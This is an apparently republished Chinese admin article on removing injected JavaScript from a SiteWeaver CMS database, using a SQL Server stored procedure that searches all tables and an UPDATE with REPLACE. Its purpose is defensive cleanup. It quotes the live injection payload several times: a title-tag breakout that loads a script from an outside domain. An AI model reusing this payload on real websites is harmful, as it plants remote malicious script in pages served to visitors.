首页 > 网站 > 网站安全 > 正文

解析【木马】手动删除动易数据库被注入JS代码的方法

2024-09-06 18:38:39
字体:
来源:转载
供稿:网友

问题:动易数据库连续几天被注入JS代码,那么可不可以直接从数据库着手进行清除木马代码操作呢?

数据库被注入的代码是:"></title><script src="http://www2.s800qn.cn/csrss/w.js"></script><!--

 

解决:发现在PE_CLASS表中的tips、Meta_Keywords、Meta_Description、LinkUrl字段存在注入的JS,表太多,一个一个去查,是比较费时费力的,那么我们可以通过一个全库搜索的方法,建立一个存储过程

create   proc   p_search  
  @str   Nvarchar(1000)   --要搜索的字符串  
  as  
  if   @str=''   return  
   
  declare   @s   Nvarchar(4000)  
  create   table   #t(表名   sysname,字段名   sysname)  
   
  declare   tb   cursor   local   for  
  select   s='if   exists(select   1   from   ['+replace(b.name,']',']]')+']   where   ['+a.name+']   like   N''%'+@str+'%'')  
  print   ''所在的表及字段:   ['+b.name+'].['+a.name+']'''  
  from   syscolumns   a   join   sysobjects   b   on   a.id=b.id  
  where   b.xtype='U'   and   a.status>=0  
  and   a.xtype   in(175,239,99,35,231,167)  
  open   tb  
  fetch   next   from   tb   into   @s  
  while   @@fetch_status=0  
  begin  
  exec(@s)  
  fetch   next   from   tb   into   @s  
  end  
  close   tb  
  deallocate   tb
GO


执行:p_search '"></title><script src="http://www2.s800qn.cn/csrss/w.js"></script><!--'

找到被注入的表及字段,执行恢复操作,下面是一个例子

UPDATE PE_Class SET Tips= Replace(Tips,'"></title><script src="http://www2.s800qn.cn/csrss/w.js"></script><!--','')
 
注意:以上虽然能较方便的处理木马代码,但我们仍要对网站文件进行清查工作,不然网站是会反复中木马的,特别是对于有生成静态页面的网站,我们要重新生成下网站页面,以正常的生成页面覆盖现有木马代码的页面
 
发表评论 共有条评论
用户名: 密码:
验证码: 匿名发表